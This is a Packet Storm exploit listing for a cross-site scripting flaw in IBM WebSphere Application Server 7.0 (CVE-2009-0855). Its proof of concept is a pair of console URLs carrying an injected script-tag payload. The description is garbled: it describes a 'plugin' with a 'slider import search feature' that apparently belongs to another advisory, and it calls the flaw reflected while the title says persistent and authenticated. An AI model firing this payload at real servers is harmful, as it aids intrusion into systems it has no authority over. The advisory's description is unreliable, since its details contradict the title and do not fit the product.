Lucene search

K
packetstormMilad KarimiPACKETSTORM:170073
HistoryDec 02, 2022 - 12:00 a.m.

IBM Websphere Application Server 7.0 Cross Site Scripting

2022-12-0200:00:00
Milad Karimi
packetstormsecurity.com
203
ibm websphere application server
cross-site scripting
persistent
authenticated
windows 10
cve 2009-0855

EPSS

0.421

Percentile

97.4%

`# Exploit Title: IBM Websphere Application Server 7.0 - Persistent Cross-Site Scripting (Authenticated)  
# Date: 2022-12-02  
# Author: Milad karimi  
# Software Link: https://www.ibm.com/support/pages/6107-websphere-application-server-v61-fix-pack-7-windows  
# Version: 7.0  
# Tested on: Windows 10  
# CVE: 2009-0855  
  
1. Description:  
This plugin creates a IBM Websphere Application Server from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.  
  
2. Proof of Concept:  
http://www.example.com/ibm/console/<script>alert('Ex3ptionaL_XSS')</script>  
http://www.example.com/ibm/console/<script>alert('Ex3ptionaL_XSS')</script>.jsp  
`

EPSS

0.421

Percentile

97.4%